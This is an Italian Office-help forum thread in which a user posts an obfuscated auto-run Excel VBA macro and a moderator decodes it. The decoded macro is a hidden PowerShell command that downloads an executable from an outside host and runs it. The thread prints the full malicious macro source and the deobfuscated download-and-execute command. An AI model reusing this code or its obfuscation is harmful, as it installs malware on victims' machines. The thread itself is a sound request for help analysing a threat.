Valutazione 4.87/ 5 (100.00%) 5838 voti

Condividi:        

macro sospetta

Vuoi potenziare i tuoi documenti Word? Non sai come si fa una macro in Excel? Devi creare una presentazione in PowerPoint?
Oppure sei passato a OpenOffice e non sei sicuro di come lavorare al meglio?

Moderatori: Anthony47, Flash30005

macro sospetta

Postdi paolone2001 » 11/09/17 09:39

ciao, un mio collega ha scaricato un file excel, sul suo pc che è in rete, dopo averlo scansionato con l'antivirus, ma poi aprendolo credo abbia consentito l'uso delle macro.
ora, vi chiedo se avete idea di cosa combini questa macro, di cui riporto il listato qui sotto.
Devo essere preoccupato?
grazie, ciao
Paolo



Sub Workbook_Open()
If xlErrorBarTypeFixedValue > 0 Then
Shell "" + nubiss, O
End If
End Sub



Function nba()
nba = """"
End Function


Function zynodaf()
portog = Array("te" + "mp", "loc" + "alap" + "pda" + "ta", "ap" + "pd" + "ata", "EMAIL")
zynodaf = portog(capitalo(0, 0))
End Function


Private Function capitalo(ByVal FromLimit As Integer, ByVal ToLimit As Integer) As Integer

Randomize
randomNumber = Int((ToLimit - FromLimit) * Rnd) + FromLimit
capitalo = randomNumber

End Function


Function egoo()
egoo = "d /c" + nba
End Function


Function recviemo()
mutopp = Array(Timer(), Minute(Now), Minute(Now), "oP" + "r -e")
helliooo = Array(Timer(), "AS" + "S -W" + "i")
nagoyya = Array(Timer(), Day(Now), "DD" + "en ")
temzaas = Array(Timer(), Minute(Now), Timer(), Null, "uT" + "i B", Minute(Now), Timer(), Null)
citroen = Array(Timer(), "eLL " + "-N")
circuus = Array(Timer(), "owe" + "RS", Nothing, Timer())
dazzac = Array(Timer(), Nothing, Timer(), "RaC" + "t")
recviemo = "p" + circuus(1) + "h" + citroen(1) + "on" + "iN" + "Te" + dazzac(3) + "iv" + "E -N" + mutopp(3) + "xeC" + temzaas(4) + "yP" + helliooo(1) + "nD" + "O " + " hI" + nagoyya(2)
End Function

Function nubiss()
flattop = zynodaf
nubiss = "c" + "M" + egoo + recviemo + nba + "(.(\""{2}{0}{1}\"" -f'-o','bj" + "ect','new') (\""{1}{3}{5}{0}{2}{4}\"" -f't','syst','.webclie','em','nt','.ne')).('d'+'ow'+'nloadfil'+'e').Invoke('http://34tfg4th.date/fmouse.exe','%" + flattop + "%.exe');&(\""{0}{2}{1}\""-f'star','ss','t-proce') '%" + flattop + "%.exe'" + nba + nba
End Function
paolone2001
Utente Junior
 
Post: 19
Iscritto il: 05/01/08 17:54

Sponsor
 

Re: macro sospetta

Postdi Anthony47 » 11/09/17 13:54

Non ho eseguito il tutto ma, semplificando, l'obiettivo della macro e' eseguire questo comando, che esegue a sua volta uno script powershell che esegue un programma exe credo scaricato da http://34tfg4th.date:
Codice: Seleziona tutto
cMd /c "poweRSheLL -NoniNTeRaCtivE -NoPr -exeCuTi ByPASS -WinDO  hIDDen "(.(\"{2}{0}{1}\" -f'-o','bject','new') (\"{1}{3}{5}{0}{2}{4}\" -f't','syst','.webclie','em','nt','.ne')).('d'+'ow'+'nloadfil'+'e').Invoke('http:// 34tfg4th.date/fmouse.exe','%temp%.exe');&(\"{0}{2}{1}\"-f'star','ss','t-proce') '%temp%.exe'""


Non credo che sia una operazione fatta a fin di bene.

Ciao
Avatar utente
Anthony47
Moderatore
 
Post: 17106
Iscritto il: 21/03/06 16:03
Località: Ivrea

Re: macro sospetta

Postdi paolone2001 » 11/09/17 16:10

Grazie Anthony,
ma dici che la macro si esegue da sola o bisogna averla lanciata cliccando da qualche parte?
paolone2001
Utente Junior
 
Post: 19
Iscritto il: 05/01/08 17:54

Re: macro sospetta

Postdi Anthony47 » 11/09/17 23:59

La macro e' stata predisposta per eseguirsi da sola all'apertura del file Excel (vedi Sub Workbook_Open); tuttavia i file provenienti es da mail o scaricati da Internet vengono aperti in "Modalita' protetta", dove le macro sono disabilitate. L'utente ha la possibilita' di aprirlo in modalita' piena e di abilitarne le macro (questa ultimissima fase dipende pero' dalle impostazioni di sicurezza); a questo punto dovrebbe essere stata eseguita la macro.

Ci potrebbe aver aiutato uno strano comportamento di Excel, che passando dalla modalita' protetta alla Modalita' piena spesso manda in debug le macro di Workbook_Open con degli errori strani. Inoltre mi sembrerebbe strano che il S.O. abbia mandato in esecuzione uno script con alti privilegi senza chiedere l'autorizzazione all'utente; ma questo lo potra' chiarire solo un esperto di Sicurezza dei Sistemi Operativi.

Purtroppo non sono in grado di dire quali danni potrebbe aver causato il comando (furto di dati? Installazione di malware? In questo secondo caso un Ripristino di sistema a una data non recentissima potrebbe aiutare, salvo che non siano state volutamente compromesse anche le "immagini" precedenti di sistema).

Ciao
Avatar utente
Anthony47
Moderatore
 
Post: 17106
Iscritto il: 21/03/06 16:03
Località: Ivrea

Re: macro sospetta

Postdi paolone2001 » 27/09/17 10:04

Ciao Anthony,
ho fatto un ripristino a 15 gg prima del "fatto" e, apparentemente, dopo altre 2 settimane non si notano malfunzionamenti o altre anomalie.
Grazie per il consiglio, come sempre
Paolo
paolone2001
Utente Junior
 
Post: 19
Iscritto il: 05/01/08 17:54


Torna a Applicazioni Office Windows


Topic correlati a "macro sospetta":


Chi c’è in linea

Visitano il forum: Nessuno e 11 ospiti